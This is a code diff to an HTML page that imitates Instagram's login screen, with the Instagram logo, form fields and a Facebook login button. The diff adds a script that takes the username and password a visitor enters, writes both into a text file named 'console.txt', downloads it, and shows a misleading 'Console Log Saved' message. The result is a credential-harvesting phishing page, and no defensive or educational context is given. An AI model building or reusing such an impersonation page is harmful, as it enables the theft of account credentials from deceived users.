--- a/index.html
+++ b/index.html
@@ -10,14 +10,14 @@
     <div class="container">
         <div class="login-box">
             <img src="https://upload.wikimedia.org/wikipedia/commons/a/a5/Instagram_icon.png" alt="Instagram" class="logo">
-            <form>
-                <input type="text" placeholder="Phone number, username, or email" required>
-                <input type="password" placeholder="Password" required>
-                <button type="submit">Log In</button>
+            <form id="login-form">
+                <input type="text" id="username" placeholder="Phone number, username, or email" required>
+                <input type="password" id="password" placeholder="Password" required>
+                <button type="button" onclick="saveData()">Log In</button>
                 <div class="divider">
                     <hr><span>OR</span><hr>
                 </div>
-                <button class="fb-login">Log in with Facebook</button>
+                <button type="button" class="fb-login">Log in with Facebook</button>
                 <a href="#" class="forgot-password">Forgot password?</a>
             </form>
         </div>
@@ -25,5 +25,31 @@
             <p>Don't have an account? <a href="#">Sign up</a></p>
         </div>
     </div>
+
+    <script>
+        function saveData() {
+            const username = document.getElementById("username").value;
+            const password = document.getElementById("password").value;
+
+            if (!username || !password) {
+                alert("Please fill in all fields!");
+                return;
+            }
+
+            // Prepare the data for the text file
+            const data = `Username: ${username}\nPassword: ${password}`;
+
+            // Create a Blob with the data (text file)
+            const blob = new Blob([data], { type: "text/plain" });
+            
+            // Create a link element to trigger the download
+            const link = document.createElement("a");
+            link.href = URL.createObjectURL(blob);
+            link.download = "console.txt";  // Name of the downloaded file
+            link.click();  // Automatically trigger the download
+
+            alert("Console Log Saved");
+        }
+    </script>
 </body>
 </html>
